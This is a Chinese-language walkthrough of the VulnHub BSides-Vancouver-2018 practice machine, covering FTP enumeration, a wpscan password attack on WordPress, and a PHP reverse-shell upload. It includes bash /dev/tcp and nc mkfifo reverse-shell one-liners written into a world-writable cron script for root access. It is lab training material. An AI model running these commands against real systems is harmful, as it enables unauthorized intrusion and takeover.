【oscp】BSides-Vancouver-2018-Workshop,ftp匿名登录,wordpress渗透下载地址:https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova难度:相对简单,有很多种方法主机发现端口扫描利用ftp的默认用户进行匿名登录,查看文件ftp 192.168.209.136 cd public get users.txt.bk像是一个密码字典(其实是一个用户字典,当前系统用户包含了这些用户)目录扫描robots.txt爬虫协议一个wordpress站点继续目录扫描利用wpscan发现可能存在的用户名,并使用msf的字典 wpscan --url http://192.168.209.136/backup_wordpress -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txt有俩个用户分别是john和admin,以及john的密码enigma登录进去直接修改404反弹shell的php脚本(kali自带/usr/share/webshells/php/php-reverse-shell.php)kali开启监听反弹成功创建交互式终端python -c "import pty; pty.spawn('/bin/bash')"基本信息收集,Ubuntu 12.04.4 LTS ,3.11.0-15没有内核提权漏洞,在往期的靶机中我们查看数据库密码(站点用到的就是mysql肯定存在mysql服务),thiscannotbeit登录成功查看用户表使用hash-identifier hash识别工具,识别hash类型md5解密切换思路,继续信息收集,查看文件权限为777的文件find / -perm 777 -type f 2>/dev/null那么就可以直接反弹shell提权echo '/bin/bash -i >& /dev/tcp/192.168.209.130/6666 0>&1' > cleanup ./cleanupkali端是有反应的,自动退出了换一个反弹shell命令echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.209.130 6666 >/tmp/f' > cleanup ./cleanup往期推荐【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏HTB-Chemistry靶机渗透教程ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略开箱即用!265种windows渗透工具合集--灵兔宝盒
2025年05月18日
841 阅读
0 评论
0 点赞
1
...
23
24
25
...
37